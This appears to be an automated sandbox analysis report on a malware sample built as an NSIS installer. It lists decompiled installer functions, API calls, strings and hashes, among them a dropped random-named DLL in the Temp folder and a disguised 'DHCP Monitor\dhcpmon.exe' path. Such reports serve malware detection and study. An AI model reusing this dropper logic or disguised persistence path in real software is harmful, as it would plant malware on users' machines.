			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C52(_t82);
				_push(_t82);
				_t83 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\9mqal9z8w5l9du.dll";
				if(_t33 == 0) {
					lstrcatA(E00405BE5(E0040624D(_t83, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					E0040624D();
				}
				E00406528(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065C1(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC1(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DE6(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405374(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4e8;
						goto L32;
					} else {
						E0040624D(0x40ac50, 0x430000);
						E0040624D(0x430000, _t83);
						E004062E0(_t75, 0x40ac50, _t83, "Error opening file for writing: C:\Users\alfons\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.",  *((intOrPtr*)(_t85 - 0x14)));
						E0040624D(0x430000, 0x40ac50);
						_t62 = E00405969("Error opening file for writing: C:\Users\alfons\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E00405374();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405374(0xffffffea,  *(_t85 - 8));
				 *0x42f514 =  *0x42f514 + 1;
				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75);
				 *0x42f514 =  *0x42f514 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c);
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc));
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062E0(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062E0(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405969();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x00401775
0x0040177c
0x00401798
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll,C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401786
Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00401826, 00401842
C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll$Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
API String ID: 1941528284-2161544939
Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406528(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C52(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
CharNextA.USER32(?,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2

Strings

"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 00406564
*?|<>/":, xrefs: 00406570
C:\Users\user\AppData\Local\Temp\, xrefs: 00406529

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1141979769
Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D

Uniqueness

Uniqueness Score: -1.00%

Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

APIs

GetWindowLongA.USER32 ref: 00404355
GetSysColor.USER32(00000000), ref: 00404393
SetTextColor.GDI32(?,00000000), ref: 0040439F
SetBkMode.GDI32(?,?), ref: 004043AB
GetSysColor.USER32(?), ref: 004043BE
SetBkColor.GDI32(?,?), ref: 004043CE
DeleteObject.GDI32(?), ref: 004043E8
CreateBrushIndirect.GDI32(?), ref: 004043F2

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405374, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405374(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f514;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
					}
					_t26 = lstrlenA(0x42a098);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a098;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a098)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a098, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

APIs

lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
SendMessageA.USER32 ref: 00405408
SendMessageA.USER32 ref: 00405422
SendMessageA.USER32 ref: 00405430

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68

Uniqueness

Uniqueness Score: -1.00%

Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42946c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42946c = 0;
					return _t15;
				}
				if( *0x42946c != 0) {
					return E00406692(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42f450) {
					if( *0x42f448 == 0) {
						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
						 *0x42946c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42f514 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E00405374(0,  &_v68);
					}
				}
				return _t6;
			}

APIs

DestroyWindow.USER32(?,00000000), ref: 00402E6A
GetTickCount.KERNEL32 ref: 00402E88
wsprintfA.USER32 ref: 00402EB6

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430

CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
ShowWindow.USER32(00000000,00000005), ref: 00402EE8

Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B

Strings

... %d%%, xrefs: 00402EB0

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404C24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

APIs

SendMessageA.USER32 ref: 00404C3F
GetMessagePos.USER32 ref: 00404C47
ScreenToClient.USER32 ref: 00404C61
SendMessageA.USER32 ref: 00404C73
SendMessageA.USER32 ref: 00404C99

Strings

f, xrefs: 00404C75

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040583A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405845
0x00405849
0x0040584c
0x00405852
0x00405856
0x0040585a
0x00405862
0x00405869
0x0040586f
0x00405876
0x00405885
0x00405887
0x00000000
0x00405887
0x00405891
0x00405898
0x004058ae
0x00000000
0x00000000
0x00000000
0x004058b0
0x004058b4

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
GetLastError.KERNEL32 ref: 00405891
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
GetLastError.KERNEL32 ref: 004058B0

Strings

C:\Program Files (x86)\DHCP Monitor, xrefs: 0040583A
C:\Users\user\AppData\Local\Temp\, xrefs: 00405860

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Program Files (x86)\DHCP Monitor$C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-1578457480
Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x42f454 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df7
0x00402dfc
0x00402dfe
0x00402dfe
0x00402e09
